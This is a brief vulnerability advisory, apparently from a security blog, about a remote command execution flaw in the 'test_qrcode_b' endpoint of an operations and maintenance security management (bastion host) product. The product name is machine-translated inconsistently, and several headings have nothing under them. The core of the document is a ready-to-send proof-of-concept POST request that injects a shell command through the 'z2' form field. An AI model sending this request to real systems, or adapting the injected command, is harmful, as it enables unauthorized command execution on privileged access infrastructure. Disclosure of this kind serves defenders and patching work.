Sfud Operation And Maintenance Security Management System Test_qrcode_b Remote Command Execution Vulnerability
Sfud Operation And Maintenance Security Management System Test_qrcode_b Remote Command Execution Vulnerability
SFUDI Operation and Maintenance Security Management System test_qrcode_b Remote Command Execution Vulnerability
Vulnerability Description
Sforddy’s operation and maintenance security management system is an operation and maintenance security management fortress developed by Sforddy.
Vulnerability Impact
SFUDI Operation and Maintenance Security Management System
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
3
4
5
6
7
8
9
10
POST /bhost/test_qrcode_b HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Content-Length: 23
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: https://xxx.xxx.xxx.xxx
Accept-Encoding: gzip
z1=1&z2="|id;"&z3=bhost
This post is licensed under CC BY 4.0 by the author.